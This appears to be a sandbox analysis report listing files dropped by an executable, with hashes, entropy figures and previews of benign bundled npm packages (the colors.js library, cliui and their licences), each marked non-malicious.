              Preview:# Automatically generated to ignore everything except bundled deps.# Ignore everything by default except this file./*.!/.gitignore.# Allow all bundled deps.!/@colors/./@colors/*.!/@colors/colors.!/@isaacs/./@isaacs/*.!/@isaacs/cliui.!/@isaacs/cliui/node_modules/./@isaacs/cliui/node_modules/*.!/@isaacs/cliui/node_modules/ansi-regex.!/@isaacs/cliui/node_modules/emoji-regex.!/@isaacs/cliui/node_modules/string-width.!/@isaacs/cliui/node_modules/strip-ansi.!/@isaacs/string-locale-compare.!/@npmcli/./@npmcli/*.!/@npmcli/agent.!/@npmcli/agent/node_modules/./@npmcli/agent/node_modules/*.!/@npmcli/agent/node_modules/agent-base.!/@npmcli/agent/node_modules/http-proxy-agent.!/@npmcli/agent/node_modules/https-proxy-agent.!/@npmcli/agent/node_modules/socks-proxy-agent.!/@npmcli/disparity-colors.!/@npmcli/fs.!/@npmcli/git.!/@npmcli/installed-package-contents.!/@npmcli/map-workspaces.!/@npmcli/metavuln-calculator.!/@npmcli/name-from-folder.!/@npmcli/node-gyp.!/@npmcli/package-json.!/@npmcli/promise-s
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1235
              Entropy (8bit):5.161690357482777
              Encrypted:false
              SSDEEP:
              MD5:12D99BE4215EA44DF59CE831ED79D258
              SHA1:0C75BF219569BCB432376A47AA7CA56E59708FB9
              SHA-256:58597DED729A5E749CC323E2AE6E533A31BE3622737B33E0239BA075CA14B515
              SHA-512:B01E4984C1855BAC5282FB9218B0391F830530E66FEFEBF590FD22E2073F473F7D55549D93BEBB11AA1F7B3A806318C9D22EFDC0D4D913414C9BAA8A68324167
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Original Library. - Copyright (c) Marak Squires..Additional Functionality. - Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com). - Copyright (c) DABH (https://github.com/DABH)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2004
              Entropy (8bit):4.91141202682451
              Encrypted:false
              SSDEEP:
              MD5:EECE3971254C2DDCBA55C1259AE999CE
              SHA1:BB023A5AA0FF537DEE2413203EE181C14F9C927F
              SHA-256:8EBC54E2C345BF1A6084F51AAD90035E4E066F9C46FDCC757FD84430602F3FA1
              SHA-512:D22261B8BAFB939CCB7C0DBC3D4C7B99C59B7DEF6B253914629BFA1C470E6B77F2D02D7727DDB2409D611D2A9E3590B3F0A6D60515F11A56955ACE1C490330CD
              Malicious:false
              Reputation:unknown
              Preview:var colors = require('../lib/index');..console.log('First some yellow text'.yellow);..console.log('Underline that text'.yellow.underline);..console.log('Make it bold and red'.red.bold);..console.log(('Double Raindows All Day Long').rainbow);..console.log('Drop the bass'.trap);..console.log('DROP THE RAINBOW BASS'.trap.rainbow);..// styles not widely supported.console.log('Chains are also cool.'.bold.italic.underline.red);..// styles not widely supported.console.log('So '.green + 'are'.underline + ' ' + 'inverse'.inverse. + ' styles! '.yellow.bold);.console.log('Zebras are so fun!'.zebra);..//.// Remark: .strikethrough may not work with Mac OS Terminal App.//.console.log('This is ' + 'not'.strikethrough + ' fun.');..console.log('Background color attack!'.black.bgWhite);.console.log('Use random styles on everything!'.random);.console.log('America, Heck Yeah!'.america);..// eslint-disable-next-line max-len.console.log('Blindingly '.brightCyan + 'bright? '.brightRed + 'Why '.brightYellow
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2119
              Entropy (8bit):4.8543354861219
              Encrypted:false
              SSDEEP:
              MD5:81EE149DBB058D34E35FE38DDEF46CC5
              SHA1:0164395722C7C3A733AFEB97B21F804B0799D151
              SHA-256:1B991D66781ACF3AE02A7CD9EF7E4CD13270A0CDA1A57146BC2DAE2216036C01
              SHA-512:235E0E4A2A957E6FD0C5DD2E9D7394C76BC81FC53FD0D31D1E955FAFD3881DEEAFAB1D751F6D5B1BEC824D7115E108897731037041A9E21D67DD8EAB9931C349
              Malicious:false
              Reputation:unknown
              Preview:var colors = require('../safe');..console.log(colors.yellow('First some yellow text'));..console.log(colors.yellow.underline('Underline that text'));..console.log(colors.red.bold('Make it bold and red'));..console.log(colors.rainbow('Double Raindows All Day Long'));..console.log(colors.trap('Drop the bass'));..console.log(colors.rainbow(colors.trap('DROP THE RAINBOW BASS')));..// styles not widely supported.console.log(colors.bold.italic.underline.red('Chains are also cool.'));..// styles not widely supported.console.log(colors.green('So ') + colors.underline('are') + ' '. + colors.inverse('inverse') + colors.yellow.bold(' styles! '));..console.log(colors.zebra('Zebras are so fun!'));..console.log('This is ' + colors.strikethrough('not') + ' fun.');...console.log(colors.black.bgWhite('Background color attack!'));.console.log(colors.random('Use random styles on everything!'));.console.log(colors.america('America, Heck Yeah!'));..// eslint-disable-next-line max-len.console.log(colors.br
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5868
              Entropy (8bit):5.043400025417817
              Encrypted:false
              SSDEEP:
              MD5:AEAE8A09F5FB6A0E6F58CDB9FBF6CFA3
              SHA1:A7A5B0CEADB0E3CAC9B4723D6158B3EE9605437D
              SHA-256:E0AA28D1CFE746E50B36EADD8B73F7077DF3003E07C4F7B3CC5C40E45C597031
              SHA-512:9CF4ED474A168434D9B195CEA759FDB35D8A814597829FEC0BC04805239985937A76D160FAD9FDE18697ACFC706CA4487779C1ED313BC45D8F21B5A44116CA5D
              Malicious:false
              Reputation:unknown
              Preview:/*..The MIT License (MIT)..Original Library. - Copyright (c) Marak Squires..Additional functionality. - Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIAB
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1677
              Entropy (8bit):4.587075110767431
              Encrypted:false
              SSDEEP:
              MD5:10BD79DAA882F24426CE6DD2130C283E
              SHA1:EC8D149DD0C3D5B260C83544A24C4F8BA6EB1A09
              SHA-256:EAC886DF893BFA10E30E28228350D5A89126A4BA773A3D0E2D74D7B56029751D
              SHA-512:633794D78E91303AF8CE902D6F21E88F597B1BC80727267BD2895C84EA32E88D3DA4AC6811A7BB21C706544B27D36A65F23CFB205D5B4ED8531A6DFC03FFA1BC
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = function runTheTrap(text, options) {. var result = '';. text = text || 'Run the trap, drop the bass';. text = text.split('');. var trap = {. a: ['\u0040', '\u0104', '\u023a', '\u0245', '\u0394', '\u039b', '\u0414'],. b: ['\u00df', '\u0181', '\u0243', '\u026e', '\u03b2', '\u0e3f'],. c: ['\u00a9', '\u023b', '\u03fe'],. d: ['\u00d0', '\u018a', '\u0500', '\u0501', '\u0502', '\u0503'],. e: ['\u00cb', '\u0115', '\u018e', '\u0258', '\u03a3', '\u03be', '\u04bc',. '\u0a6c'],. f: ['\u04fa'],. g: ['\u0262'],. h: ['\u0126', '\u0195', '\u04a2', '\u04ba', '\u04c7', '\u050a'],. i: ['\u0f0f'],. j: ['\u0134'],. k: ['\u0138', '\u04a0', '\u04c3', '\u051e'],. l: ['\u0139'],. m: ['\u028d', '\u04cd', '\u04ce', '\u0520', '\u0521', '\u0d69'],. n: ['\u00d1', '\u014b', '\u019d', '\u0376', '\u03a0', '\u048a'],. o: ['\u00d8', '\u00f5', '\u00f8', '\u01fe', '\u0298', '\u047a', '\u05dd',. '\u06dd', '\u0e4f'],. p: ['\u01f7', '\u048e'],.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):2890
              Entropy (8bit):4.580016947715588
              Encrypted:false
              SSDEEP:
              MD5:FD04E09CDC372A7B98E03A0791A2C10C
              SHA1:874EEF937D0E95291E995584C132FB2A0DED6AAB
              SHA-256:124463A7437210CD07269461255ECD45CE8AF1AC48C8508857CB07514FA42C03
              SHA-512:9F558EA0D9C684A90B25012E0BED046922FAC858F951480FC80949E20C612C93BDA5A444317F18956019974970E21A070C9C03357261BBB5484947299A11C09E
              Malicious:false
              Reputation:unknown
              Preview:// please no.module['exports'] = function zalgo(text, options) {. text = text || ' he is here ';. var soul = {. 'up': [. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.',. ],. 'down': [. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. ],. 'mid': [. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.', '.',. '.', '.', '.',. '.', '.', '.', '.',. '.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3295
              Entropy (8bit):4.659648066175913
              Encrypted:false
              SSDEEP:
              MD5:312D1A151B59C5662A717A9F2CB7A71E
              SHA1:8F67D601A072C9160FF688A21927753D5116D28F
              SHA-256:DA39555A80DAACF5BF56DB9228CC5268A5EF2D209706AA8A7FB0C618902037EA
              SHA-512:712759F36D9E6862127BE9C41962B7322E7E8DF93BEBB90B96C47E60F8C7FD64BE7C0972D962D9ED8AEB731C642511C63F8E03BE869C99A6D0D08E0CCF2F08E4
              Malicious:false
              Reputation:unknown
              Preview:var colors = require('./colors');..module['exports'] = function() {. //. // Extends prototype of native string object to allow for "foo".red syntax. //. var addProperty = function(color, func) {. String.prototype.__defineGetter__(color, func);. };.. addProperty('strip', function() {. return colors.strip(this);. });.. addProperty('stripColors', function() {. return colors.strip(this);. });.. addProperty('trap', function() {. return colors.trap(this);. });.. addProperty('zalgo', function() {. return colors.zalgo(this);. });.. addProperty('zebra', function() {. return colors.zebra(this);. });.. addProperty('rainbow', function() {. return colors.rainbow(this);. });.. addProperty('random', function() {. return colors.random(this);. });.. addProperty('america', function() {. return colors.america(this);. });.. //. // Iterate through all default styles and colors. //. var x = Object.keys(colors.styles);. x.forEach(function(style) {. addP
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):369
              Entropy (8bit):4.713445174139629
              Encrypted:false
              SSDEEP:
              MD5:AFBFFA68255E2A11A197724A7F44266C
              SHA1:7D17BE54FD3E8709CCC8675C77E973087755FF10
              SHA-256:1465F31DBE9E763BFC246F3AE66F78F8B3E3229ECADAF58135D12A7E2596D4EC
              SHA-512:20589C94C986DCFFE9F89192B36AA3157586DC6805ACD0AB194FCA2CF7B0A569C78F2C51B902F76ED6B12E2B7D318BB08B45A34082863B230CFED0AEF7A5B45B
              Malicious:false
              Reputation:unknown
              Preview:var colors = require('./colors');.module['exports'] = colors;..// Remark: By default, colors will add style properties to String.prototype..//.// If you don't wish to extend String.prototype, you can do this instead and.// native String will not be touched:.//.// var colors = require('colors/safe);.// colors.red("foo").//.//.require('./extendStringPrototype')();.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):278
              Entropy (8bit):4.3434325314115325
              Encrypted:false
              SSDEEP:
              MD5:5088213A9DB0E451AD6E583F6065CC31
              SHA1:93197F184AE42006229373314E3DF6E29B1602BB
              SHA-256:A8747ED6F9FDE27C23D8374A87FA6A80898C72C9BE80959B405382624C07FFB4
              SHA-512:0D592416C07463236A1F5E39A97CDB1F5A979EA1FC09C3A13879BF83E09FCC146926441C0C6966F9CDD4A2609C60FC0301052921F2F904537DAC2FCED85B3DA9
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = function(colors) {. return function(letter, i, exploded) {. if (letter === ' ') return letter;. switch (i%3) {. case 0: return colors.red(letter);. case 1: return colors.white(letter);. case 2: return colors.blue(letter);. }. };.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):311
              Entropy (8bit):4.5902157350801644
              Encrypted:false
              SSDEEP:
              MD5:D5ECD753D7F60ED9B25A56EBB85DEEAD
              SHA1:581CDFD9DD9D1449C2C0FC0D77FFDDA713415B6E
              SHA-256:85641874E0C1B9304099169479BF89B29B46C7E042C16CACEF9B5E4C5F8B9E7F
              SHA-512:B7E6A18673F2657243320E45026B94DF1E7B139BD5244BDCE08F7C7645AA8A803B1A2276E1A5CBD34DE5C8CE39AC5779EA3EE508DB01EEEFE37D1B0E2F4E5A77
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = function(colors) {. // RoY G BiV. var rainbowColors = ['red', 'yellow', 'green', 'blue', 'magenta'];. return function(letter, i, exploded) {. if (letter === ' ') {. return letter;. } else {. return colors[rainbowColors[i++ % rainbowColors.length]](letter);. }. };.};..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):454
              Entropy (8bit):4.61472405539987
              Encrypted:false
              SSDEEP:
              MD5:DCF15F9BFE36DB8471A73ED2465A5B30
              SHA1:B657B6477D0F9680A0E316ADA993DB165F28CBAB
              SHA-256:A0461E6327C356E9815E4273C9972EF63C77535E9DDA29D7F5A8CF4B1B896ACE
              SHA-512:8CD9C5873ACBD77F3734DA8AD47C5A875F0BAA6A97B9B022AB497994D8D9D496EDD7C431A43F7FDA24DA273D6BC6B8150CAEB9644279174576F29FED7527D5F8
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = function(colors) {. var available = ['underline', 'inverse', 'grey', 'yellow', 'red', 'green',. 'blue', 'white', 'cyan', 'magenta', 'brightYellow', 'brightRed',. 'brightGreen', 'brightBlue', 'brightWhite', 'brightCyan', 'brightMagenta'];. return function(letter, i, exploded) {. return letter === ' ' ? letter :. colors[. available[Math.round(Math.random() * (available.length - 2))]. ](letter);. };.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):146
              Entropy (8bit):4.456055176072578
              Encrypted:false
              SSDEEP:
              MD5:992877DB0BB4B1A8793B1CC0533ACC5A
              SHA1:577A98A2D5116FDF4145EFCDA27293052ADCC352
              SHA-256:07F31C776E6FED5A0660DBD6D1848C5C0944F0A1E53E4A7813DA0B23286750CA
              SHA-512:1D612E3927AE48C99274029B9CCC7D51F1E1011B499C6C9C788E1B063D1E385062AF8085EB9F40401B08486318A5EDFF885771200A2626C22EBA03411D387485
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = function(colors) {. return function(letter, i, exploded) {. return i % 2 === 0 ? letter : colors.inverse(letter);. };.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2513
              Entropy (8bit):5.359696520803059
              Encrypted:false
              SSDEEP:
              MD5:CDAFDC6DC4D16CA04034F289D40547F5
              SHA1:F76065B794D382CD8702B19A0C4523A06D537D9D
              SHA-256:D469BF3213ACD43F72BE593ACDACF925F248893E015F13C12A4A365A2076ECF2
              SHA-512:DB800988265D01AC7E75E83E375493F85407AE443D4B09A524C8F2DFF2C340ED718A3D6B66B929CACBFEF3624541B52721145CDBBE7ECAD12C775240BD9BB738
              Malicious:false
              Reputation:unknown
              Preview:/*.The MIT License (MIT)..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1415
              Entropy (8bit):5.285915494868282
              Encrypted:false
              SSDEEP:
              MD5:E2ABB168551E20C66E89E8BB2108C0EA
              SHA1:414FF6FE54234EEB07A52887BCC462DDBFA892E1
              SHA-256:CBBE0081CC62A0E54ED201DC0C1503A507DAA076B7BDBAA40ECCFAA5FD9D1D07
              SHA-512:B35B96E1D62884AD0F2012353611986C9586ED3780556E5D9838FF8328313B590EE3729BA5D8D49C1AA8F9B6CFAC0A736BC01336DC467E97BD74DDA383F83C9C
              Malicious:false
              Reputation:unknown
              Preview:/*.MIT License..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR O
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4049
              Entropy (8bit):5.249413699216452
              Encrypted:false
              SSDEEP:
              MD5:5E53710D6B83525F0227F5F9AFA4F6C1
              SHA1:232B5DA48A433E4C6F545B48FE692056B3A87445
              SHA-256:8ED006395E84E32CF3AD027C789817360D3553E66CC01A63D66E0DFEA9F42A00
              SHA-512:107AC75F6F02AE2C2592D4806681262E9A22104279AD0C08DBADF6CDF642D1B7C96C7667E83FE2344463318DB10156CB4E2692EB1433F603161056DAC1E64ADA
              Malicious:false
              Reputation:unknown
              Preview:/*.The MIT License (MIT)..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1059
              Entropy (8bit):4.41117940728432
              Encrypted:false
              SSDEEP:
              MD5:B092A102465822C89484AAE094A5965A
              SHA1:32854FE5AE88137F329372C00C3DC2F614C94DBB
              SHA-256:FE58F1CE2ED2BE1ECD7FCE134676372EB4949E2BA0D7D91D41B8F34A988E9576
              SHA-512:668444C16BB992B0DBEBD3B95C6AE0F5F5D955A722D99DD507C0EA01276742775606D1AB96C0A077A892423EA69FB50EB013F2A44295B57F80FA44F04A3AE663
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@colors/colors",. "description": "get colors in your node.js console",. "version": "1.5.0",. "author": "DABH",. "contributors": [. {. "name": "DABH",. "url": "https://github.com/DABH". }. ],. "homepage": "https://github.com/DABH/colors.js",. "bugs": "https://github.com/DABH/colors.js/issues",. "keywords": [. "ansi",. "terminal",. "colors". ],. "repository": {. "type": "git",. "url": "http://github.com/DABH/colors.js.git". },. "license": "MIT",. "scripts": {. "lint": "eslint . --fix",. "test": "export FORCE_COLOR=1 && node tests/basic-test.js && node tests/safe-test.js". },. "engines": {. "node": ">=0.1.90". },. "main": "lib/index.js",. "files": [. "examples",. "lib",. "LICENSE",. "safe.js",. "themes",. "index.d.ts",. "safe.d.ts". ],. "devDependencies": {. "eslint": "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):248
              Entropy (8bit):4.706549727431777
              Encrypted:false
              SSDEEP:
              MD5:B9538BED90769A2FE122A57DC07A4943
              SHA1:A055C3C673FFE9DA4B9B6336F5D715B278913F19
              SHA-256:672CC883942925CE2E36076CCAF2D3CAF7DEB7C50FFE65601B40DE54281CD1C9
              SHA-512:6FFE8D8C31541379B076955390BCAFE9F38D51CF776C0F934FFC7E38BAC97485DE2B2F15F58A00CA9AF79CDD0195851B839DC760214DE4851545E0C18ADCC4F4
              Malicious:false
              Reputation:unknown
              Preview://.// Remark: Requiring this file will use the "safe" colors API,.// which will not touch String.prototype..//.// var colors = require('colors/safe');.// colors.red("foo").//.//.var colors = require('./lib/colors');.module['exports'] = colors;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):199
              Entropy (8bit):4.372966494377215
              Encrypted:false
              SSDEEP:
              MD5:77A8C3B452702BDDC76E90F53E465FDF
              SHA1:7517E57D6DA65F3242DCD2D91A51C981BAFE7C48
              SHA-256:20A79C0ECF57FE4736D6F04F808A772A64A3700C1DB9DAD4CCB37269EB761223
              SHA-512:11C522D39409385E27B97CF4CA840234C26E4507B424BE5C9DEE77B519D84175B226819A2E9F0CC85AA4C577D4822C57FA9AABD39C532AA888A2B6B655504481
              Malicious:false
              Reputation:unknown
              Preview:module['exports'] = {. silly: 'rainbow',. input: 'grey',. verbose: 'cyan',. prompt: 'grey',. info: 'green',. data: 'grey',. help: 'cyan',. warn: 'yellow',. debug: 'blue',. error: 'red',.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):731
              Entropy (8bit):5.00963536194009
              Encrypted:false
              SSDEEP:
              MD5:83623193D3051CA8068A89A455C699CA
              SHA1:039FA81EB89FC5C892F5CE2D22EE6AC0A8503880
              SHA-256:2DC0465729366C3A7890DFA9E972A1BA7048A26C02116FB8B419A6A1AC110149
              SHA-512:1FE7A70FDDF399F5703165FCA5355DC5FBB349E15A908DCA328E1CA99799B48EF59EE99DF54BF2E174D81F0B88E36C8B2BBA915A33D5719095D05AE6919E7E3C
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2015, Contributors..Permission to use, copy, modify, and/or distribute this software.for any purpose with or without fee is hereby granted, provided.that the above copyright notice and this permission notice.appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES.OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE.LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES.OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,.ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):10398
              Entropy (8bit):4.24439228190838
              Encrypted:false
              SSDEEP:
              MD5:47DAE5DF7E3D5E0D94911F63B7DFCFB5
              SHA1:D48E8476113471B52120A1A5451A4F087C66FB0A
              SHA-256:820AA357A7F6A022BFC3AC6AC19D1681921D0421CAE898D5096423C0FB3B8607
              SHA-512:48D10D6D7B1D82819ADEC345C2813B29EDAFF8CF10C7F5CD1C43D7B6773D2FC0A7F96F6AD157CE2F37634CA2C7607A41D8A0F24CD7F56886A2DF6E6B1CBD30E2
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const align = {. right: alignRight,. center: alignCenter.};.const top = 0;.const right = 1;.const bottom = 2;.const left = 3;.class UI {. constructor(opts) {. var _a;. this.width = opts.width;. /* c8 ignore start */. this.wrap = (_a = opts.wrap) !== null && _a !== void 0 ? _a : true;. /* c8 ignore stop */. this.rows = [];. }. span(...args) {. const cols = this.div(...args);. cols.span = true;. }. resetOutput() {. this.rows = [];. }. div(...args) {. if (args.length === 0) {. this.div('');. }. if (this.wrap && this.shouldApplyLayoutDSL(...args) && typeof args[0] === 'string') {. return this.applyLayoutDSL(args[0]);. }. const cols = args.map(arg => {. if (typeof arg === 'string') {. return this.colFromString(arg);. }. return arg;. });. this.rows.push(cols);. ret
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1050
              Entropy (8bit):4.731847815460223
              Encrypted:false
              SSDEEP:
              MD5:BBC26F6E5D9AF34A3996E8A0A70C909C
              SHA1:56D687354A1D13989B2FA9E5409799B4916B5A37
              SHA-256:385FCEBA2F49EE3F91CD436D3F84B389375E1E8F86906B23F47DF2E1B9C2B17B
              SHA-512:88A9FF3D161EB5CED567EFDC10E2DBDFE299EFB74987311F982FFD948345358F916190A6CD9A3E2071D020A0CDD2A72CF193895D1867C92F2AC8C6764DE15251
              Malicious:false
              Reputation:unknown
              Preview:interface UIOptions {. width: number;. wrap?: boolean;. rows?: string[];.}.interface Column {. text: string;. width?: number;. align?: "right" | "left" | "center";. padding: number[];. border?: boolean;.}.interface ColumnArray extends Array<Column> {. span: boolean;.}.interface Line {. hidden?: boolean;. text: string;. span?: boolean;.}.declare class UI {. width: number;. wrap: boolean;. rows: ColumnArray[];. constructor(opts: UIOptions);. span(...args: ColumnArray): void;. resetOutput(): void;. div(...args: (Column | string)[]): ColumnArray;. private shouldApplyLayoutDSL;. private applyLayoutDSL;. private colFromString;. private measurePadding;. toString(): string;. rowToString(row: ColumnArray, lines: Line[]): Line[];. // if the full 'source' can render in. // the target line, do so.. private renderInline;. private rasterize;. private negatePadding;. private columnWidths;.}.declare function u
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):10100
              Entropy (8bit):4.220914110527
              Encrypted:false
              SSDEEP:
              MD5:3DF08507EBEB83A522978C95A0E11631
              SHA1:D8BA04747A972E69C353347598653D250F644716
              SHA-256:E67B3446F47D4A672339C99BEA9E987979DA9FC70F421701814CB9D52BA176BA
              SHA-512:DD7529BFE3D73B4A9D4A6F969695218036D8CC4766872836EC814B4637C430FD7C8CE3719F2D1141965F4CB3A9F2C6BEC56B79212E1E6927D8A205385F6B464B
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.const align = {. right: alignRight,. center: alignCenter.};.const top = 0;.const right = 1;.const bottom = 2;.const left = 3;.export class UI {. constructor(opts) {. var _a;. this.width = opts.width;. /* c8 ignore start */. this.wrap = (_a = opts.wrap) !== null && _a !== void 0 ? _a : true;. /* c8 ignore stop */. this.rows = [];. }. span(...args) {. const cols = this.div(...args);. cols.span = true;. }. resetOutput() {. this.rows = [];. }. div(...args) {. if (args.length === 0) {. this.div('');. }. if (this.wrap && this.shouldApplyLayoutDSL(...args) && typeof args[0] === 'string') {. return this.applyLayoutDSL(args[0]);. }. const cols = args.map(arg => {. if (typeof arg === 'string') {. return this.colFromString(arg);. }. return arg;. });. this.rows.push(cols);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):299
              Entropy (8bit):4.58780442827093
              Encrypted:false
              SSDEEP:
              MD5:A2B246A7A0232E4C635709E49822B12E
              SHA1:3B8FA93AC8A7793DA40AD5B8F07DF2A4A8B9F700
